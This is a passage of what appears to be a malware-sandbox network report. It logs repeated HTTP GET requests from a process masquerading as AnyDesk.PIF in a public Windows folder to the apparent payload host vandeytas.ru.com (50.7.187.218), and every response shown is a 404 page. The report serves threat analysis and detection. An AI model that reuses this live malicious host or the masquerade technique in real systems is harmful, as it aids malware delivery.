                                                    2024-11-26 08:39:31 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    20192.168.2.44977750.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:32 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:33 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:33 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:33 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    21192.168.2.44977950.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:34 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:35 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:35 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:35 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    22192.168.2.44978150.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:36 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:37 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:37 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:37 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    23192.168.2.44978350.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:39 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:39 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:39 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:39 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    24192.168.2.44978550.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:41 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:41 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:41 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:41 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    25192.168.2.44978950.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:43 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:43 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:43 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:43 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    26192.168.2.44979650.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:45 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:46 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:46 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:46 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    27192.168.2.44980350.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:47 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:48 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:48 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:48 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    28192.168.2.44981050.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:50 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:50 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:50 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:50 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    29192.168.2.44981750.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:52 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:52 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:52 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:52 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    30192.168.2.44982450.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:54 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:54 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:54 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:54 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    31192.168.2.44983150.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:56 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:56 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:56 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:56 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    32192.168.2.44983850.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:58 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:59 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:58 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
